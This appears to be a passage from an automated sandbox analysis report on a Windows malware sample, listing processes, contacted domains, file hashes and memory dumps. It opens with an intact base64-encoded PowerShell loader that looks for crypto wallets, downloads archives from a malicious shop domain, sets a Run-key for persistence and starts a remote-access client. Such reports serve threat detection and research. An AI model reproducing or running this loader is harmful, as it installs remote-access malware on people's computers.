QB3AEEAbABsAGUAVAAnADsAIAAkAHYANAB0AG8ATgArACcAQgBMAG8AYwBrAFMAVAByAGUAYQBtAFwAYgBsAE8AQwBLAFMAdAByAGUAQQBNACAAZwByAEUARQBuAFwAQgBMAG8AQwBLAFMAdABSAGUAYQBNACAARwBSAEUAZQBuAC4AZQBYAGUAJwA7ACAAJABWADQAdABPAE4AKwAnAE8AbgBlAEsARQBZAFwAbwBuAEUAawBlAHkALgBlAHgAZQAnADsAIAApADsAIAAkAGgATgBvAHoAPQAkAFkAbQBDAFoALgBsAEUATgBHAFQAaAA7ACAAaQBGACAAKAAkADkAdgB4AE4ANQApACAAewAkAHYAdgBwAFMAPQAxAH0AIABFAEwAcwBlACAAewAgAGYAbwByACAAKAAkAE0AOQBwAHcAQQA9ADAAOwAgACQAbQA5AFAAdwBhACAALQBMAHQAIAAkAEgATgBPAHoAIAAtAGEATgBEACAAJAB2AFYAUABTACAALQBFAHEAIAAwADsAIAAkAE0AOQBQAHcAYQArACsAKQAgAHsAIABJAEYAIAAoAHQARQBzAFQALQBwAGEAdABoACAAJAB5AE0AQwBaAFsAJABtADkAUAB3AGEAXQApACAAewAkAFYAdgBQAHMAPQAxAH0AOwB9ADsAfQA7ACAASQBmACAAKAAkAHYAdgBwAHMAIAAtAGUAcQAgADEAKQAgAHsAIABDAGgAZABpAFIAIAAkAEUAbgB2ADoAQQBQAFAAZABBAFQAYQA7ACAAJABSAFIAUgBFAGUAZgBIAEcAPQBnAGUAdAAtAGMATwBtAG0AYQBuAEQAIABFAHgAcABBAG4ARAAtAGEAUgBDAEgASQB2AEUAIAAtAEUAUgByAE8AUgBBAGMAdABJAG8AbgAgAHMAaQBMAEUATgBUAGwAeQBjAE8ATgB0AEkAbgBVAEUAOwAgACQAdABsAGUAUQByAFkAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0ANABuAGQALgB6AGkAcAAnADsAIAAkAFYAagByAEYAdABDAGcARwA9ACcAaAB0AHQAcABzADoALwAvAG0AaQBuAGQAZgB1AHMAdABlAHAAcwAuAHMAaABvAHAALwBtAGkAbgB6AC8AbQAyAG4AZAAuAHoAaQBwACcAOwAgACQAYgBFAHoAZwBqAHYAUQBJAD0AJwB2AGQAZgBvAHIANABoAHEALgB6AGkAcAAnADsAIAAkAHkAWABDAFAAZQBNAFEAUgA9AEcAQwBNACAAUwB0AGEAUgB0AC0AYgBpAHQAcwBUAFIAQQBuAFMAZgBFAFIAIAAtAEUAcgBSAG8AUgBhAEMAVABJAE8ATgAgAHMAaQBMAGUATgBUAGwAeQBDAE8AbgB0AEkATgBVAGUAOwAgACQAOABHAFEAOQBuAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AegAvAG0AMwBuAGQALgB6AGkAcAAnADsAIAAkADgAVABnAHEAMwBFADUAPQAnADMAcQBvADMARgBjAE8ALgB6AGkAcAAnADsAIAAkAGcARwBCAEQAcgBuAGwAPQAnAFMAbQBhAHIAdABEAGUAZgByAGEAZwBUAG8AbwBsACcAOwAgACQASgBmAEMAaQBuAEcAPQAnADEAYQBLAEgAeABQAEIALgB6AGkAcAAnADsAIABbAE4AZQB0AC4AcwBlAHIAdgBpAGMAZQBwAE8ASQBOAFQAbQBBAE4AYQBHAGUAcgBdADoAOgBTAEUAYwBVAFIAaQBUAHkAUAByAE8AdABvAEMATwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwBVAHIAaQBUAHkAcAByAE8AdABvAGMAbwBsAHQAWQBQAGUAXQA6ADoAdABMAHMAMQAyADsAIAAkAHUARgBHADkAYgA3AGoAegA9ACcAbQBBAEwAbABRAEEALgB6AGkAcAAnADsAIAAkAGIAOAA3AE4AOQB1AD0AJwBoAHQAdABwAHMAOgAvAC8AbQBpAG4AZABmAHUAcwB0AGUAcABzAC4AcwBoAG8AcAAvAG0AaQBuAHoALwBtADEAbgBkAC4AegBpAHAAJwA7ACAAJABVAHAAeABlAHcANgBGAD0AIgAkAGUATgBWADoAYQBQAFAARABBAHQAYQBcACQAOABUAGcAcQAzAEUANQAiADsAIAAkAHQAagBlADYAZwAzAD0AJABFAE4AVgA6AGEAcABQAGQAQQB0AEEALAAgACQAYgBFAHoAZwBqAHYAUQBJACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAMwBzAFUASABFAFgAbwA9ACIAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEAXAAkAEoAZgBDAGkAbgBHACIAOwAgACQANAA1AFkASgBXAHkAQgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABFAE4AdgA6AGEAUABQAGQAYQBUAGEALAAgACQAdQBGAEcAOQBiADcAagB6ADsAIAAkAEEAcgBNAFgASQByAFkAdgA9ACIAYgBpAHQAcwBhAEQAbQBJAE4ALgBlAFgAZQAgAC8AVAByAEEAbgBzAGYARQByACAANgBEAHIAeQA2AGgAcABvACAALwBEAE8AdwBuAGwATwBBAEQAIAAvAFAAUgBpAE8AcgBJAFQAWQAgAG4AbwBSAE0AYQBsACAAJABWAGoAcgBGAHQAQwBnAEcAIAAkAFUAcAB4AGUAdwA2AEYAIgA7ACAAJAAxAG0AcABoAHUAVABTAGkAPQAiACQARQBuAFYAOgBhAHAAcABEAGEAdABBAFwAJABnAEcAQgBEAHIAbgBsACIAOwAgACQAQwBLAGcAbABkAFYAPQAiAGIAaQBUAFMAQQBkAG0AaQBOAC4ARQB4AEUAIAAvAHQAUgBhAE4AcwBmAGUAcgAgADAAbQAxAFkAcwBMADcAIAAvAGQATwB3AG4ATABvAEEAZAAgAC8AUAByAEkAbwByAEkAVABZACAATgBvAFIAbQBBAGwAIAAkADgARwBRADkAbgB0ACAAJAB0AGoAZQA2AGcAMwAiADsAIAAkAHUARQB4AFoANgBSAFAARAA9ACcAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgACcAKwAkAGIAOAA3AE4AOQB1ACsAJwAgACcAKwAkADMAcwBVAEgARQBYAG8AOwAgACQAcABGADcASAA1AEoAVQA9ACIAYgBJAFQAUwBhAGQATQBpAG4ALgBlAHgAZQAgAC8AdABSAEEAbgBTAGYARQBSACAAcABYAFIAUABEAGYAdAAgAC8ARABvAFcATgBsAG8AQQBkACAALwBwAFIASQBvAFIASQB0AFkAIABuAE8AcgBtAGEAbAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQAYgA4ADcATgA5AHUALAAgACQANAA1AFkASgBXAHkAQgA7ACAASQBmACAAKAAkAFIAUgBSAEUAZQBmAEgARwApACAAewAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIABTAHQAYQByAHQALQBCAEkAVABTAHQAcgBhAE4AUwBmAGUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkAFYAagByAEYAdABDAGcARwAgAC0ARABlAHMAdABJAG4AQQB0AEkATwBuACAAJABVAHAAeABlAHcANgBGADsAIABzAFQAYQByAHQALQBCAEkAVABzAHQAUgBBAE4AUwBGAEUAUgAgAC0AcwBPAHUAUgBjAEUAIAAkADgARwBRADkAbgB0ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAG4AIAAkAHQAagBlADYAZwAzADsAIABzAFQAQQByAHQALQBiAEkAVABTAHQAcgBBAE4AUwBmAEUAUgAgAC0AcwBvAFUAcgBjAEUAIAAkAGIAOAA3AE4AOQB1ACAALQBEAEUAcwBUAEkATgBhAHQASQBPAE4AIAAkADMAcwBVAEgARQBYAG8AOwAgAHMAVABBAFIAVAAtAEIAaQBUAHMAdABSAGEAbgBTAEYARQByACAALQBzAE8AdQBSAGMARQAgACQAdABsAGUAUQByAFkAIAAtAEQARQBzAFQAaQBuAGEAdABpAG8ATgAgACQANAA1AFkASgBXAHkAQgA7ACAAfQAgAEUAbABTAEUAIAB7AGkARQBYACAALQBjAG8AbQBtAGEATgBEACAAJAB1AEUAeABaADYAUgBQAEQAOwAgAEkARQBYACAALQBDAG8AbQBtAEEAbgBEACAAJABwAEYANwBIADUASgBVADsAIABpAGUAeAAgAC0AYwBvAG0AbQBhAG4AZAAgACQAQQByAE0AWABJAHIAWQB2ADsAIAAmACAAJABDAEsAZwBsAGQAVgA7ACAAfQAgAEUAeABwAEEATgBEAC0AQQByAGMAaABpAFYAZQAgAC0AUABBAFQAaAAgACQANAA1AFkASgBXAHkAQgAgAC0ARABlAFMAdABJAE4AYQBUAEkAbwBuAFAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AHAAQQBOAEQALQBhAFIAYwBoAGkAVgBFACAALQBQAGEAdABIACAAJAB0AGoAZQA2AGcAMwAgAC0AZABlAHMAdABpAG4AYQBUAEkAbwBOAHAAYQB0AGgAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAARQB4AFAAQQBOAGQALQBBAFIAQwBIAGkAdgBFACAALQBwAEEAdABIACAAJAAzAHMAVQBIAEUAWABvACAALQBkAEUAUwBUAGkAbgBhAFQAaQBPAE4AcABBAHQASAAgACQAMQBtAHAAaAB1AFQAUwBpADsAIABlAHgAUABBAG4AZAAtAEEAcgBDAGgAaQBWAGUAIAAtAHAAYQB0AGgAIAAkAFUAcAB4AGUAdwA2AEYAIAAtAEQAZQBTAFQAaQBuAGEAdABpAG8ATgBwAEEAdABIACAAJAAxAG0AcABoAHUAVABTAGkAOwAgAFIAbQAgAC0AUABhAFQAaAAgACQAdABqAGUANgBnADMAOwAgAFIARAAgAC0AcABBAFQASAAgACQAVQBwAHgAZQB3ADYARgA7ACAAUgBEACAALQBwAEEAdABIACAAJAA0ADUAWQBKAFcAeQBCADsAIAByAGUATQBPAHYAZQAtAEkAdABlAG0AIAAtAFAAQQBUAGgAIAAkADMAcwBVAEgARQBYAG8AOwAgAH0AIABFAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAPQBAACgAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBpAG4AaQAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAEgAVABDAFQATAAzADIALgBEAEwATAAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcALAAgACcAbQBzAHYAYwByADEAMAAwAC4AZABsAGwAJwApADsAIABuAGkAIAAtAFAAQQBUAGgAIAAkAEUAbgB2ADoAYQBQAHAAZABBAHQAQQAgAC0AbgBBAG0AZQAgACQAZwBHAEIARAByAG4AbAAgAC0AaQBUAGUATQBUAHkAUABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIAAkAGcAMQBpADUAcgB4AEIAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAGkAbgBkAGYAdQBzAHQAZQBwAHMALgBzAGgAbwBwAC8AbQBpAG4AZAAvACcAOwAgAEkARgAgACgAJAB5AFgAQwBQAGUATQBRAFIAKQAgAHsAIAAkAFoAQQBQAFAAZgB0ACAAfAAgAEYAbwBSAEUAQQBjAGgALQBPAEIAagBFAEMAdAAgAHsAIAAkAGgARQBWAFQARwB1AHEAbwA9ACQAZwAxAGkANQByAHgAQgArACQAXwA7ACAAJABTAE0ASgBLAE4AUAA9AGoATwBJAE4ALQBwAEEAdABoACAALQBQAEEAdABoACAAJAAxAG0AcABoAHUAVABTAGkAIAAtAGMASABpAGwARABQAGEAVABoACAAJABfADsAIABzAHQAYQBSAHQALQBiAEkAVABTAHQAcgBhAG4AUwBGAEUAUgAgAC0AcwBPAHUAcgBDAGUAIAAkAGgARQBWAFQARwB1AHEAbwAgAC0AZABFAHMAVABpAG4AQQBUAGkAbwBOACAAJABTAE0ASgBLAE4AUAA7ACAAfQA7AH0AIABlAEwAUwBFACAAewAgACQAWgBBAFAAUABmAHQAIAB8ACAAZgBvAFIARQBhAEMASAAtAG8AQgBKAEUAQwBUACAAewAgACQAaABFAFYAVABHAHUAcQBvAD0AJABnADEAaQA1AHIAeABCACsAJABfADsAIAAkAFMATQBKAEsATgBQAD0AJAAxAG0AcABoAHUAVABTAGkALAAgACQAXwAgAC0AagBPAEkATgAgACcAXAAnADsAIAAkAHAAUgBsAHIAYQBhAFoAQwA9ACcAQgBpAHQAUwBhAGQAbQBJAE4ALgBlAHgARQAgAC8AdAByAEEAbgBTAGYARQByACAANgBMAFAAdAA4AEsAMgBnACAALwBkAG8AVwBuAGwAbwBBAGQAIAAvAFAAUgBJAE8AUgBJAFQAeQAgAE4ATwByAE0AQQBMACAAJwArACQAaABFAFYAVABHAHUAcQBvACsAJwAgACcAKwAkAFMATQBKAEsATgBQADsAIABJAEUAWAAgAC0AQwBvAG0AbQBBAG4ARAAgACQAcABSAGwAcgBhAGEAWgBDADsAfQA7ACAAfQA7ACAAfQA7ACAAJAB5AEYAaAB6AEYATAA9AEcASQAgACQAMQBtAHAAaAB1AFQAUwBpACAALQBmAG8AcgBDAGUAOwAgACQAeQBGAGgAegBGAEwALgBhAFQAVABSAGkAYgB1AHQARQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIABDAGgAZABpAFIAIAAkADEAbQBwAGgAdQBUAFMAaQA7ACAAJABYAEMAVQBGAGcAYwBxAD0AIgAkADEAbQBwAGgAdQBUAFMAaQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAOwAgAE4ARQBXAC0ASQB0AEUAbQBwAFIAbwBwAGUAUgBUAHkAIAAtAFAAYQB0AEgAIAAnAEgASwBDAHUAOgBcAHMAbwBGAFQAdwBBAFIAZQBcAE0ASQBDAHIAbwBzAG8ARgB0AFwAdwBpAE4ARABPAFcAUwBcAGMAVQBSAHIARQBuAFQAVgBFAFIAcwBJAE8ATgBcAHIAdQBuACcAIAAtAG4AQQBtAGUAIAAkAGcARwBCAEQAcgBuAGwAIAAtAHYAYQBsAFUAZQAgACQAWABDAFUARgBnAGMAcQAgAC0AUAByAE8AUABFAHIAdAB5AHQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAFMAdABhAHIAdAAtAFAAUgBPAEMAZQBTAFMAIABjAGwASQBFAG4AdAAzADIALgBFAFgAZQA7ACAAfQA7AA==
C:\Users\Admin\AppData\Roaming\0VYTBW.pif
"C:\Users\Admin\AppData\Roaming\0VYTBW.pif" "C:\Users\Admin\AppData\Roaming\KHOIE0.vsd"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fiuflJZlSGqtte.fiuflJZlSGqtte | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | toleratedbaybo.cyou | udp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | 229.38.21.104.in-addr.arpa | udp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 172.67.185.54:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 172.67.191.17:443 | pixelpalette.shop | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.185.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.191.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mindfusteps.shop | udp |
| MD | 213.159.73.34:443 | mindfusteps.shop | tcp |
| US | 8.8.8.8:53 | 34.73.159.213.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Coordination
| MD5 | 485f89cfaf1420f132a95a0b7c6e6305 |
| SHA1 | efb827df52282fb79b5f44ec9e63b8e5a47c37e1 |
| SHA256 | eea03a384671dd1323b8d853ed49df8a27dbc2a706400437bd8d48e6076453bd |
| SHA512 | 116c823265a05c4b338e94204ce48267f112d12e55a8473fc05426af0a476c37fc272408eb805d117f6e8cab059fbd708c6158bd041ff3e9a8a430a577cc669b |
C:\Users\Admin\AppData\Local\Temp\Portfolio
| MD5 | 4d06e14fe2951aa0024c22936e5f531b |
| SHA1 | c718b677b65d246033898069459f078a00f650be |
| SHA256 | 0e3ab81f015e71af9b43ed7fd5854c3560c6ce09443b0cbffb0ac6c10d93d918 |
| SHA512 | 5bf78bc3bfce3553dff1e80ec3fef4c2589e618b1a3ac2723ed89a24c5fdd78b5e80f2bc778346f21b2c5f9750c00ea7a5ba9b3bd42f9f9f804ef838b92c887c |
C:\Users\Admin\AppData\Local\Temp\Shoppers
| MD5 | 52620731f9486725cceaf71e1a45cc9f |
| SHA1 | 0d166e1027ae7903dced0abe3570f71516fc5baf |
| SHA256 | 73e5301ad4b4aea78e34de20b8088641fc1d04b1444ed4ecbc6da47603d87cc2 |
| SHA512 | b4546af693050332c0477dd38b5e816ac2fe490d550ae296ef759714c33c96a648e4ed96294b777392bbfaf6fba876460f78c5730ecc61ef801f45cdb298dc36 |
C:\Users\Admin\AppData\Local\Temp\Canada
| MD5 | d426ef537d4e36651d372eb67de61c71 |
| SHA1 | c00ecae6e973056c698680c714bd8c932df53c56 |
| SHA256 | f0919fbdae23b005eb403344118d8509a316037ae5460484d81d8452a74812e3 |
| SHA512 | d042b71e1badef416e42f8c1235163ed7a71ae5d3cd897aca1dbb2b344769428b37e71e7b9b1a6c0ffbfdab8222eff893fc28415389b5afdcd262bd7eb7a40d6 |
C:\Users\Admin\AppData\Local\Temp\Dv
| MD5 | 367fecb6d4d73f3e22e2186fbe91f216 |
| SHA1 | 2bce21a05dfeee536cda999fbaa73c1af28b9d86 |
| SHA256 | 11741c20239ea1dd1c392abda3ee226e16ad2fd004f8fe344d2d068c8e20ef62 |
| SHA512 | 09009011345cc71715ba9ff975d0d304d3160090281a3c9672187b2f2c3eeab3653c31849f1306ae3d77459e0de8f63ce2037c0d330c16c361491d32b089b315 |
C:\Users\Admin\AppData\Local\Temp\Admissions
| MD5 | b9675af1aafe9bbc3397bb840117840a |
| SHA1 | e0fae0f4ef594f472216025e838fadbb2aa0b861 |
| SHA256 | 875276f91f4aa27b3d23da12c88e94871fe7ed6401ec8f4657b4f6be2f33a01d |
| SHA512 | 70a24225488d1e41f36244d7811766e2379b8c90ea57d1fb5d33b54e2f62e032002a7c2e45aeb8f47e45840a6cc16cfed5680f88e71de68b3a15af73db24a5e6 |
C:\Users\Admin\AppData\Local\Temp\Strand
| MD5 | cd7bd19edb3ded5365bab0e5956309db |
| SHA1 | 1e0d4ba49a9592faebcfa4119f523ca7735108bb |
| SHA256 | 84078ab15033945d702802a013fbc3142b56db1371ff79ba1107df211300d803 |
| SHA512 | 574476aaf140810d1cfd9a99187097d68c024c89c57f82a2399e2933f46e854989364759e35474048eaad35b817c63d05e19ed75393ec893bbaf57f7061d96e4 |
C:\Users\Admin\AppData\Local\Temp\Boring
| MD5 | 10e29c8822f7da216b45a11d3ee0eda8 |
| SHA1 | 23e62cb3f04cd00b22fe54a65e3b81518c78e614 |
| SHA256 | 4a4f9151f243bd1eca82a0721bae4136e37c3835324991516c62fc70f99dcb05 |
| SHA512 | c0a2772c8ae6c4b450f38327c8386f526ffff7f3bec3bf6e495a2a01b465da64de4d815e51961f37cb43239b05d3fd53a01fb4b33cd0fa67a84680bc24ffe572 |
C:\Users\Admin\AppData\Local\Temp\Evaluation
| MD5 | 9c1eec6ad97d3430478939c6df01ea8a |
| SHA1 | be6e6c3fbb3fb22e34d7b5bc2c1a2d996bb4e81e |
| SHA256 | fbc43c30a07c44894f7870d666d3e370f4d5f77695d5fa727597884c1495fc9b |
| SHA512 | 2f4923eccd70a2790b6a6e4876f91aa9fd87b7e767abac3e48084b14de21a7beccf471eca35b9df1069e67ed18407916213ff7b52b129fe252c7169b2081bad6 |
C:\Users\Admin\AppData\Local\Temp\Synthetic
| MD5 | c0391116646bfea7d85bb681a33e3ba0 |
| SHA1 | 9996422133ed60d69b923b118949183e8758e0a3 |
| SHA256 | 5791d23d4c78f0e17d98eee9e51ebf24ea678fdf9b059bfb5dcf19c16dcba85a |
| SHA512 | 3e6a4e31ad6161fa617aa116378d9817390a031e640a157cdda299e8d0dddc4e27517ff53ed56081c0c34b348be627b6a5ab6f1c1ae9192f34a446ba19b23f47 |
C:\Users\Admin\AppData\Local\Temp\208231\War.pif
| MD5 | 78ba0653a340bac5ff152b21a83626cc |
| SHA1 | b12da9cb5d024555405040e65ad89d16ae749502 |
| SHA256 | 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7 |
| SHA512 | efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317 |
C:\Users\Admin\AppData\Local\Temp\208231\O
| MD5 | 36464052c5bab6fbe9375ae0c39f051a |
| SHA1 | cd35ee319164eb8a73bc8b5f86fea33b7227ae64 |
| SHA256 | d0b9c83c8bddbe2d9e18b0e8c5e3abcdb3bac5a9f6f3058fc3bcb8d3fde78ced |
| SHA512 | 01a7c98f1fa174dfc72360372b01e641a432e5b429ac3a366a9648f42e1776e9cfd5f9834173a8483fc470b1ec7fcadde7a7f639e07f08dadf460f5b46e9cb59 |
memory/4172-553-0x0000000000470000-0x00000000004C7000-memory.dmp
memory/4172-555-0x0000000000470000-0x00000000004C7000-memory.dmp
memory/4172-554-0x0000000000470000-0x00000000004C7000-memory.dmp
memory/4172-558-0x0000000000470000-0x00000000004C7000-memory.dmp
memory/4172-557-0x0000000000470000-0x00000000004C7000-memory.dmp
memory/4172-556-0x0000000000470000-0x00000000004C7000-memory.dmp
memory/3948-564-0x0000000004910000-0x0000000004946000-memory.dmp
memory/4172-567-0x00000000069F0000-0x0000000006A29000-memory.dmp
memory/4172-566-0x00000000069F0000-0x0000000006A29000-memory.dmp
memory/4172-565-0x0000000000470000-0x00000000004C7000-memory.dmp
memory/3948-572-0x0000000004FD0000-0x00000000055F8000-memory.dmp
memory/3948-573-0x0000000005660000-0x0000000005682000-memory.dmp
memory/3948-574-0x0000000005780000-0x00000000057E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfruxvds.332.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
